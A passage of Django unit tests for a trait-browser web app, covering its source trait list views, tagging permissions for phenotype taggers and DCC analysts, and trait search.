self.assertFalse(context['user_is_study_tagger'])
class SourceTraitListTest(UserLoginTestCase):
"""Unit tests for the SourceTraitList view."""
def setUp(self):
super(SourceTraitListTest, self).setUp()
self.source_traits = factories.SourceTraitFactory.create_batch(
10, source_dataset__source_study_version__i_is_deprecated=False)
def get_url(self, *args):
return reverse('trait_browser:source:traits:list')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url())
context = response.context
self.assertIn('source_trait_table', context)
self.assertIsInstance(context['source_trait_table'], tables.SourceTraitTableFull)
def test_no_deprecated_traits_in_table(self):
"""No deprecated traits are shown in the table."""
deprecated_traits = factories.SourceTraitFactory.create_batch(
10, source_dataset__source_study_version__i_is_deprecated=True)
response = self.client.get(self.get_url())
context = response.context
table = context['source_trait_table']
for trait in deprecated_traits:
self.assertNotIn(trait, table.data)
for trait in self.source_traits:
self.assertIn(trait, table.data)
def test_table_has_no_rows(self):
"""When there are no source traits, there are no rows in the table, but the view still works."""
models.SourceTrait.objects.all().delete()
response = self.client.get(self.get_url())
context = response.context
table = context['source_trait_table']
self.assertEqual(len(table.rows), 0)
class StudySourceTraitListTest(UserLoginTestCase):
"""."""
def setUp(self):
super(StudySourceTraitListTest, self).setUp()
self.study = factories.StudyFactory.create()
self.source_traits = factories.SourceTraitFactory.create_batch(
10, source_dataset__source_study_version__i_is_deprecated=False,
source_dataset__source_study_version__study=self.study)
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:traits:list', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.study.pk))
self.assertEqual(response.status_code, 200)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('study', context)
self.assertIn('trait_count', context)
self.assertIn('dataset_count', context)
self.assertEqual(context['study'], self.study)
self.assertEqual(context['trait_count'], '{:,}'.format(len(self.source_traits)))
dataset_count = models.SourceDataset.objects.filter(source_study_version__study=self.study).count()
self.assertEqual(context['dataset_count'], '{:,}'.format(dataset_count))
def test_no_deprecated_traits_in_table(self):
"""No deprecated traits are shown in the table."""
deprecated_traits = factories.SourceTraitFactory.create_batch(
10, source_dataset__source_study_version__i_is_deprecated=True,
source_dataset__source_study_version__study=self.study)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
for trait in deprecated_traits:
self.assertNotIn(trait, table.data)
for trait in self.source_traits:
self.assertIn(trait, table.data)
def test_table_has_no_rows(self):
"""When there are no source traits, there are no rows in the table, but the view still works."""
models.SourceTrait.objects.all().delete()
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
self.assertEqual(len(table.rows), 0)
class StudySourceTraitNewListTest(UserLoginTestCase):
def setUp(self):
super().setUp()
self.study = factories.StudyFactory.create()
now = timezone.now()
self.study_version_1 = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=1, i_date_added=now - timedelta(hours=2), i_is_deprecated=True)
self.study_version_2 = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=2, i_date_added=now - timedelta(hours=1), i_is_deprecated=True)
self.study_version_3 = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=3, i_date_added=now)
# Convert these lists to prevent queryset evaluation later on, after other traits have been created.
# Create traits for the first version.
self.source_traits_v1 = list(factories.SourceTraitFactory.create_batch(
5, source_dataset__source_study_version=self.study_version_1))
# Create traits with the same accessions for the second and third versions.
for x in self.source_traits_v1:
factories.SourceTraitFactory.create(
source_dataset__source_study_version=self.study_version_2,
i_dbgap_variable_accession=x.i_dbgap_variable_accession)
factories.SourceTraitFactory.create(
source_dataset__source_study_version=self.study_version_3,
i_dbgap_variable_accession=x.i_dbgap_variable_accession)
self.source_traits_v2 = list(models.SourceTrait.objects.filter(
source_dataset__source_study_version=self.study_version_2))
self.source_traits_v3 = list(models.SourceTrait.objects.filter(
source_dataset__source_study_version=self.study_version_3))
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:traits:new', args=args)
def test_context_data(self):
"""View has appropriate data in the context."""
new_trait = factories.SourceTraitFactory.create(
source_dataset__source_study_version=self.study_version_3)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('study', context)
self.assertIn('trait_count', context)
self.assertIn('dataset_count', context)
self.assertEqual(context['study'], self.study)
self.assertEqual(context['trait_count'], '{:,}'.format(len(self.source_traits_v3) + 1))
self.assertEqual(context['dataset_count'], '{:,}'.format(len(self.source_traits_v3) + 1))
def test_no_deprecated_traits_in_table(self):
"""No deprecated traits are shown in the table."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
for trait in self.source_traits_v1:
self.assertNotIn(trait, table.data)
for trait in self.source_traits_v2:
self.assertNotIn(trait, table.data)
def test_no_updated_traits(self):
"""Table does not include new traits that also exist in previous version."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
for trait in self.source_traits_v3:
self.assertNotIn(trait, table.data)
def test_no_removed_traits(self):
"""Table does not include traits that only exist in previous version."""
removed_trait_1 = factories.SourceTraitFactory.create(
source_dataset__source_study_version=self.study_version_1)
removed_trait_2 = factories.SourceTraitFactory.create(
source_dataset__source_study_version=self.study_version_2,
i_dbgap_variable_accession=removed_trait_1.i_dbgap_variable_accession)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
self.assertNotIn(removed_trait_1, table.data)
self.assertNotIn(removed_trait_2, table.data)
self.assertEqual(len(table.data), 0)
def test_includes_one_new_trait(self):
"""Table includes one new trait in this version."""
new_trait = factories.SourceTraitFactory.create(
source_dataset__source_study_version=self.study_version_3)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
self.assertIn(new_trait, table.data)
def test_includes_two_new_traits(self):
"""Table includes two new traits in this version."""
new_traits = factories.SourceTraitFactory.create_batch(
2, source_dataset__source_study_version=self.study_version_3)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
for new_trait in new_traits:
self.assertIn(new_trait, table.data)
def test_no_previous_study_version(self):
"""Works if there is no previous version of the study."""
self.study_version_1.delete()
self.study_version_2.delete()
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
self.assertEqual(len(table.data), 0)
for trait in self.source_traits_v3:
self.assertNotIn(trait, table.data)
def test_does_not_compare_with_two_versions_ago(self):
"""Does not include traits that were new in an older previous version but not the most recent version of the study.""" # noqa
new_trait_2 = factories.SourceTraitFactory.create(
source_dataset__source_study_version=self.study_version_2)
new_trait_3 = factories.SourceTraitFactory.create(
source_dataset__source_study_version=self.study_version_3,
i_dbgap_variable_accession=new_trait_2.i_dbgap_variable_accession)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
table = context['source_trait_table']
self.assertNotIn(new_trait_3, table.data)
class StudyTaggedTraitListTest(UserLoginTestCase):
def setUp(self):
super(StudyTaggedTraitListTest, self).setUp()
self.study = factories.StudyFactory.create()
self.tagged_traits = TaggedTraitFactory.create_batch(
10, trait__source_dataset__source_study_version__study=self.study)
def get_url(self, *args):
return reverse('trait_browser:source:studies:pk:traits:tagged', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.study.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.study.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('study', context)
self.assertEqual(context['study'], self.study)
self.assertIn('tag_counts', context)
# Spot-check one of the tag counts.
self.assertEqual(context['tag_counts'][0]['tt_count'], 1)
# The button linking to this view should be present when study.get_non_archived_traits_tagged_count > 0.
self.assertContains(response, self.get_url(self.study.pk))
def test_tag_links_present(self):
"""Links to each of the tag/study pages are present."""
response = self.client.get(self.get_url(self.study.pk))
for tagged_trait in self.tagged_traits:
tag_study_url = reverse(
'tags:tag:study:list', kwargs={'pk': tagged_trait.tag.pk, 'pk_study': self.study.pk})
self.assertIn(tag_study_url, str(response.content))
def test_context_data_no_taggedtraits(self):
"""View has appropriate data in the context and works when there are no tagged traits for the study."""
TaggedTrait.objects.all().delete()
response = self.client.get(self.get_url(self.study.pk))
context = response.context
self.assertIn('study', context)
self.assertEqual(context['study'], self.study)
self.assertIn('tag_counts', context)
self.assertEqual(len(context['tag_counts']), 0)
# The button linking to this view shouldn't be present because study.get_non_archived_traits_tagged_count is 0.
self.assertNotContains(response, self.get_url(self.study.pk))
def test_context_data_excludes_archived_taggedtraits(self):
"""View context data does not include archived taggedtraits."""
TaggedTrait.objects.all().delete()
tag = TagFactory.create()
# Make fake tagged traits that all have the same tag.
self.tagged_traits = TaggedTraitFactory.create_batch(
10, trait__source_dataset__source_study_version__study=self.study, tag=tag)
archived_tagged_trait = self.tagged_traits[0]
archived_tagged_trait.archive()
archived_tagged_trait.refresh_from_db()
response = self.client.get(self.get_url(self.study.pk))
context = response.context
tag_count_row = context['tag_counts'][0]
self.assertEqual(tag_count_row['tt_count'], TaggedTrait.objects.non_archived().count())
self.assertEqual(tag_count_row['tt_count'], TaggedTrait.objects.all().count() - 1)
def test_no_deprecated_traits(self):
"""Counts exclude traits tagged from deprecated study versions."""
TaggedTrait.objects.all().delete()
tag = TagFactory.create()
current_study_version = factories.SourceStudyVersionFactory.create(study=self.study, i_version=5)
old_study_version = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=4, i_is_deprecated=True)
current_trait = factories.SourceTraitFactory.create(source_dataset__source_study_version=current_study_version)
old_trait = factories.SourceTraitFactory.create(source_dataset__source_study_version=old_study_version)
current_tagged_trait = TaggedTraitFactory.create(trait=current_trait, tag=tag)
old_tagged_trait = TaggedTraitFactory.create(trait=old_trait, tag=tag)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
tag_count_row = context['tag_counts'][0]
self.assertEqual(tag_count_row['tt_count'], 1)
def test_no_deprecated_traits_with_same_version_number(self):
"""Counts exclude traits tagged from deprecated study versions even with same version number."""
TaggedTrait.objects.all().delete()
tag = TagFactory.create()
current_study_version = factories.SourceStudyVersionFactory.create(study=self.study, i_version=5)
old_study_version = factories.SourceStudyVersionFactory.create(
study=self.study, i_version=current_study_version.i_version, i_is_deprecated=True)
current_trait = factories.SourceTraitFactory.create(source_dataset__source_study_version=current_study_version)
old_trait = factories.SourceTraitFactory.create(source_dataset__source_study_version=old_study_version)
current_tagged_trait = TaggedTraitFactory.create(trait=current_trait, tag=tag)
old_tagged_trait = TaggedTraitFactory.create(trait=old_trait, tag=tag)
response = self.client.get(self.get_url(self.study.pk))
context = response.context
tag_count_row = context['tag_counts'][0]
self.assertEqual(tag_count_row['tt_count'], 1)
class PhenotypeTaggerSourceTraitTaggingTest(PhenotypeTaggerLoginTestCase):
def setUp(self):
super(PhenotypeTaggerSourceTraitTaggingTest, self).setUp()
self.trait = factories.SourceTraitFactory.create(source_dataset__source_study_version__study=self.study)
self.tag = TagFactory.create()
self.user.refresh_from_db()
def get_url(self, *args):
"""Get the url for the view this class is supposed to test."""
return reverse('trait_browser:source:traits:tagging', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.trait.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertTrue('form' in context)
self.assertTrue('trait' in context)
self.assertEqual(context['trait'], self.trait)
def test_creates_new_object(self):
"""Posting valid data to the form correctly tags a trait."""
# Check on redirection to detail page, M2M links, and creation message.
response = self.client.post(self.get_url(self.trait.pk), {'tag': self.tag.pk})
new_object = TaggedTrait.objects.latest('pk')
self.assertIsInstance(new_object, TaggedTrait)
self.assertRedirects(response, reverse('trait_browser:source:traits:detail', args=[self.trait.pk]))
self.assertEqual(new_object.tag, self.tag)
self.assertEqual(new_object.trait, self.trait)
self.assertIn(self.trait, self.tag.all_traits.all())
self.assertIn(self.tag, self.trait.all_tags.all())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertFalse('Oops!' in str(messages[0]))
def test_invalid_form_message(self):
"""Posting invalid data results in a message about the invalidity."""
response = self.client.post(self.get_url(self.trait.pk), {'tag': '', })
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
def test_post_blank_tag(self):
"""Posting bad data to the form doesn't tag the trait and shows a form error."""
response = self.client.post(self.get_url(self.trait.pk), {'tag': '', })
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
form = response.context['form']
self.assertEqual(form['tag'].errors, [u'This field is required.'])
self.assertNotIn(self.tag, self.trait.all_tags.all())
def test_adds_user(self):
"""When a trait is successfully tagged, it has the appropriate creator."""
response = self.client.post(self.get_url(self.trait.pk),
{'tag': self.tag.pk})
new_object = TaggedTrait.objects.latest('pk')
self.assertEqual(self.user, new_object.creator)
def test_forbidden_non_taggers(self):
"""View returns 403 code when the user is not in phenotype_taggers."""
phenotype_taggers = Group.objects.get(name='phenotype_taggers')
self.user.groups.remove(phenotype_taggers)
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 403)
def test_forbidden_empty_taggable_studies(self):
"""View returns 403 code when the user has no taggable_studies."""
self.user.profile.taggable_studies.remove(self.study)
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 403)
def test_forbidden_trait_not_in_taggable_studies(self):
"""View returns 403 code when the trait is not in the user's taggable_studies."""
# Remove the study linked to the trait, but add another study so that taggable_studies is not empty.
self.user.profile.taggable_studies.remove(self.study)
another_study = factories.StudyFactory.create()
self.user.profile.taggable_studies.add(another_study)
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 403)
def test_fails_when_trait_is_already_tagged(self):
"""Tagging a trait fails when the trait has already been tagged with this tag."""
tagged_trait = TaggedTraitFactory.create(tag=self.tag, trait=self.trait)
response = self.client.post(self.get_url(self.trait.pk), {'tag': self.tag.pk, })
self.assertEqual(response.status_code, 200)
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
def test_fails_when_trait_is_already_tagged_but_archived(self):
"""Tagging a trait fails when the trait has already been tagged with this tag, but archived."""
tagged_trait = TaggedTraitFactory.create(tag=self.tag, trait=self.trait, archived=True)
response = self.client.post(self.get_url(self.trait.pk), {'tag': self.tag.pk, })
self.assertEqual(response.status_code, 200)
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
def test_get_redirect_deprecated_traits(self):
"""Redirects to the detail page when attempting to tag a deprecated source trait."""
sv = self.trait.source_dataset.source_study_version
sv.i_is_deprecated = True
sv.save()
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, self.trait.get_absolute_url())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
def test_post_redirect_deprecated_traits(self):
"""Redirects to the detail page when attempting to tag a deprecated source trait."""
sv = self.trait.source_dataset.source_study_version
sv.i_is_deprecated = True
sv.save()
response = self.client.post(self.get_url(self.trait.pk), {'tag': self.tag.pk})
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, self.trait.get_absolute_url())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
class DCCAnalystSourceTraitTaggingTest(DCCAnalystLoginTestCase):
def setUp(self):
super(DCCAnalystSourceTraitTaggingTest, self).setUp()
self.study = factories.StudyFactory.create()
self.trait = factories.SourceTraitFactory.create(source_dataset__source_study_version__study=self.study)
self.tag = TagFactory.create()
self.user.refresh_from_db()
def get_url(self, *args):
"""Get the url for the view this class is supposed to test."""
return reverse('trait_browser:source:traits:tagging', args=args)
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 200)
def test_view_with_invalid_pk(self):
"""View returns 404 response code when the pk doesn't exist."""
response = self.client.get(self.get_url(self.trait.pk + 1))
self.assertEqual(response.status_code, 404)
def test_context_data(self):
"""View has appropriate data in the context."""
response = self.client.get(self.get_url(self.trait.pk))
context = response.context
self.assertTrue('form' in context)
self.assertTrue('trait' in context)
self.assertEqual(context['trait'], self.trait)
def test_creates_new_object(self):
"""Posting valid data to the form correctly tags a trait."""
# Check on redirection to detail page, M2M links, and creation message.
response = self.client.post(self.get_url(self.trait.pk), {'tag': self.tag.pk})
new_object = TaggedTrait.objects.latest('pk')
self.assertIsInstance(new_object, TaggedTrait)
self.assertRedirects(response, reverse('trait_browser:source:traits:detail', args=[self.trait.pk]))
self.assertEqual(new_object.tag, self.tag)
self.assertEqual(new_object.trait, self.trait)
self.assertIn(self.trait, self.tag.all_traits.all())
self.assertIn(self.tag, self.trait.all_tags.all())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertFalse('Oops!' in str(messages[0]))
def test_invalid_form_message(self):
"""Posting invalid data results in a message about the invalidity."""
response = self.client.post(self.get_url(self.trait.pk), {'tag': ''})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
def test_post_blank_tag(self):
"""Posting bad data to the form doesn't tag the trait and shows a form error."""
response = self.client.post(self.get_url(self.trait.pk), {'tag': '', })
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
form = response.context['form']
self.assertEqual(form['tag'].errors, [u'This field is required.'])
self.assertNotIn(self.tag, self.trait.all_tags.all())
def test_adds_user(self):
"""When a trait is successfully tagged, it has the appropriate creator."""
response = self.client.post(self.get_url(self.trait.pk),
{'tag': self.tag.pk, })
new_object = TaggedTrait.objects.latest('pk')
self.assertEqual(self.user, new_object.creator)
def test_forbidden_non_dcc_analyst(self):
"""View returns 403 code when the user is removed from dcc analysts and staff."""
phenotype_taggers = Group.objects.get(name='dcc_analysts')
self.user.groups.remove(phenotype_taggers)
self.user.is_staff = False
self.user.save()
self.user.refresh_from_db()
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 403)
def test_with_empty_taggable_studies(self):
"""View returns 200 code when the DCC user has no taggable_studies."""
self.user.profile.taggable_studies.remove(self.study)
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 200)
def test_with_trait_not_in_taggable_studies(self):
"""View returns 200 code even when the trait is not in the user's taggable_studies."""
# Remove the study linked to the trait, but add another study so that taggable_studies is not empty.
self.user.profile.taggable_studies.remove(self.study)
another_study = factories.StudyFactory.create()
self.user.profile.taggable_studies.add(another_study)
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 200)
def test_fails_when_trait_is_already_tagged(self):
"""Tagging a trait fails when the trait has already been tagged with this tag."""
tagged_trait = TaggedTraitFactory.create(tag=self.tag, trait=self.trait)
response = self.client.post(self.get_url(self.trait.pk), {'tag': self.tag.pk, })
self.assertEqual(response.status_code, 200)
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
def test_fails_when_trait_is_already_tagged_but_archived(self):
"""Tagging a trait fails when the trait has already been tagged with this tag, but archived."""
tagged_trait = TaggedTraitFactory.create(tag=self.tag, trait=self.trait, archived=True)
response = self.client.post(self.get_url(self.trait.pk), {'tag': self.tag.pk, })
self.assertEqual(response.status_code, 200)
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
def test_get_redirect_deprecated_traits(self):
"""Redirects to the detail page when attempting to tag a deprecated source trait."""
sv = self.trait.source_dataset.source_study_version
sv.i_is_deprecated = True
sv.save()
response = self.client.get(self.get_url(self.trait.pk))
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, self.trait.get_absolute_url())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
def test_post_redirect_deprecated_traits(self):
"""Redirects to the detail page when attempting to tag a deprecated source trait."""
sv = self.trait.source_dataset.source_study_version
sv.i_is_deprecated = True
sv.save()
response = self.client.post(self.get_url(self.trait.pk), {'tag': self.tag.pk})
self.assertEqual(response.status_code, 302)
self.assertRedirects(response, self.trait.get_absolute_url())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertTrue('Oops!' in str(messages[0]))
class SourceTraitSearchTest(ClearSearchIndexMixin, UserLoginTestCase):
def get_url(self, *args):
return reverse('trait_browser:source:traits:search')
def test_view_success_code(self):
"""View returns successful response code."""
response = self.client.get(self.get_url())
self.assertEqual(response.status_code, 200)
def test_context_data_with_empty_form(self):
"""View has the correct context upon initial load."""
response = self.client.get(self.get_url())
context = response.context
self.assertIsInstance(context['form'], forms.SourceTraitSearchMultipleStudiesForm)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_blank_form(self):
"""View has the correct context upon invalid form submission."""
response = self.client.get(self.get_url(), {'description': ''})
context = response.context
self.assertTrue(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
def test_context_data_with_valid_search_and_no_results(self):
"""View has correct context with a valid search but no results."""
response = self.client.get(self.get_url(), {'description': 'test'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
def test_context_data_with_valid_search_and_some_results(self):
"""View has correct context with a valid search and existing results."""
factories.SourceTraitFactory.create(i_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem'})
qs = searches.search_source_traits(description='lorem')
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertQuerysetEqual(qs, [repr(x) for x in context['results_table'].data])
def test_context_data_with_valid_search_and_a_specified_study(self):
"""View has correct context with a valid search and existing results if a study is selected."""
trait = factories.SourceTraitFactory.create(i_description='lorem ipsum')
study = trait.source_dataset.source_study_version.study
factories.SourceTraitFactory.create(i_description='lorem other')
get = {'description': 'lorem', 'studies': [study.pk]}
response = self.client.get(self.get_url(), get)
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(trait)])
def test_context_data_with_valid_search_and_trait_name(self):
"""View has correct context with a valid search and existing results if a study is selected."""
trait = factories.SourceTraitFactory.create(i_description='lorem ipsum', i_trait_name='dolor')
factories.SourceTraitFactory.create(i_description='lorem other', i_trait_name='tempor')
response = self.client.get(self.get_url(), {'description': 'lorem', 'name': 'dolor'})
qs = searches.search_source_traits(description='lorem', name='dolor')
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertQuerysetEqual(qs, [repr(x) for x in context['results_table'].data])
def test_context_data_no_messages_for_initial_load(self):
"""No messages are displayed on initial load of page."""
response = self.client.get(self.get_url())
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_no_messages_for_invalid_form(self):
"""No messages are displayed if form is invalid."""
response = self.client.get(self.get_url(), {'description': ''})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 0)
def test_context_data_info_message_for_no_results(self):
"""A message is displayed if no results are found."""
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '0 results found.')
def test_context_data_info_message_for_one_result(self):
"""A message is displayed if one result is found."""
factories.SourceTraitFactory.create(i_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '1 result found.')
def test_context_data_info_message_for_multiple_result(self):
"""A message is displayed if two results are found."""
factories.SourceTraitFactory.create(i_description='lorem ipsum')
factories.SourceTraitFactory.create(i_description='lorem ipsum 2')
response = self.client.get(self.get_url(), {'description': 'lorem'})
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 1)
self.assertEqual(str(messages[0]), '2 results found.')
def test_table_pagination(self):
"""Table pagination works correctly on the first page."""
n_traits = TABLE_PER_PAGE + 2
factories.SourceTraitFactory.create_batch(n_traits, i_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertEqual(len(context['results_table'].rows), n_traits)
def test_form_works_with_table_pagination_on_second_page(self):
"""Table pagination works correctly on the second page."""
n_traits = TABLE_PER_PAGE + 2
factories.SourceTraitFactory.create_batch(n_traits, i_description='lorem ipsum')
response = self.client.get(self.get_url(), {'description': 'lorem', 'page': 2})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertEqual(len(context['results_table'].rows), n_traits)
def test_table_ordering(self):
"""Traits are ordered by dataset and then variable accession."""
dataset = factories.SourceDatasetFactory.create()
trait_1 = factories.SourceTraitFactory.create(
i_dbgap_variable_accession=2,
source_dataset=dataset, i_description='lorem ipsum')
trait_2 = factories.SourceTraitFactory.create(
i_dbgap_variable_accession=1,
source_dataset=dataset, i_description='lorem other')
response = self.client.get(self.get_url(), {'description': 'lorem'})
context = response.context
table = context['results_table']
self.assertEqual(list(table.data), [trait_2, trait_1])
def test_reset_button_works_on_initial_page(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(), {'reset': 'Reset'}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_reset_button_works_with_data_in_form(self):
"""Reset button returns to original page."""
response = self.client.get(self.get_url(), {'reset': 'Reset', 'name': ''}, follow=True)
context = response.context
self.assertIn('form', context)
self.assertFalse(context['form'].is_bound)
self.assertFalse(context['has_results'])
self.assertIn('results_table', context)
self.assertEqual(len(context['results_table'].rows), 0)
def test_short_words_in_trait_description_are_removed(self):
"""Short words are properly removed."""
trait_1 = factories.SourceTraitFactory.create(i_description='lorem ipsum')
trait_2 = factories.SourceTraitFactory.create(i_description='lorem')
response = self.client.get(self.get_url(), {'description': 'lorem ip'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertEqual(len(context['results_table'].rows), 2)
self.assertIn(trait_1, context['results_table'].data)
self.assertIn(trait_2, context['results_table'].data)
def test_message_for_ignored_short_words_in_trait_description(self):
response = self.client.get(self.get_url(), {'description': 'lorem ip'})
context = response.context
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 2)
self.assertIn('Ignored short words in "Variable description" field', str(messages[0]))
def test_filters_by_dataset_description_if_requested(self):
"""View has correct results when filtering by dataset."""
dataset = factories.SourceDatasetFactory.create(i_dbgap_description='a dataset about demographic measurements')
trait = factories.SourceTraitFactory.create(i_description='lorem ipsum', source_dataset=dataset)
other_dataset = factories.SourceDatasetFactory.create(i_dbgap_description='foo')
factories.SourceTraitFactory.create(i_description='lorem ipsum', source_dataset=other_dataset)
input = {'description': 'lorem', 'dataset_description': 'demographic', 'dataset_name': ''}
response = self.client.get(self.get_url(), input)
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertQuerysetEqual(context['results_table'].data, [repr(trait)])
def test_finds_no_traits_if_dataset_search_doesnt_match(self):
"""View has correct results when filtering by dataset."""
dataset = factories.SourceDatasetFactory.create(i_dbgap_description='a dataset about demographic measurements')
trait = factories.SourceTraitFactory.create(i_description='lorem ipsum', source_dataset=dataset)
response = self.client.get(self.get_url(), {'description': 'lorem', 'dataset_description': 'something'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertEqual(len(context['results_table'].rows), 0)
def test_short_words_in_dataset_description_are_removed(self):
"""Short words are properly removed."""
dataset_1 = factories.SourceDatasetFactory.create(i_dbgap_description='lorem ipsum')
trait_1 = factories.SourceTraitFactory.create(i_trait_name='foobar', source_dataset=dataset_1)
dataset_2 = factories.SourceDatasetFactory.create(i_dbgap_description='lorem')
trait_2 = factories.SourceTraitFactory.create(i_trait_name='foobar', source_dataset=dataset_2)
response = self.client.get(self.get_url(), {'name': 'foobar', 'dataset_description': 'lorem ip'})
context = response.context
self.assertIn('form', context)
self.assertTrue(context['has_results'])
self.assertIsInstance(context['results_table'], tables.SourceTraitTableFull)
self.assertEqual(len(context['results_table'].rows), 2)
self.assertIn(trait_1, context['results_table'].data)
self.assertIn(trait_2, context['results_table'].data)
def test_message_for_ignored_short_words_in_dataset_description(self):
response = self.client.get(self.get_url(), {'name': 'foo', 'dataset_description': 'lorem ip'})
context = response.context
messages = list(response.wsgi_request._messages)
self.assertEqual(len(messages), 2)
self.assertIn('Ignored short words in "Dataset description" field', str(messages[0]))
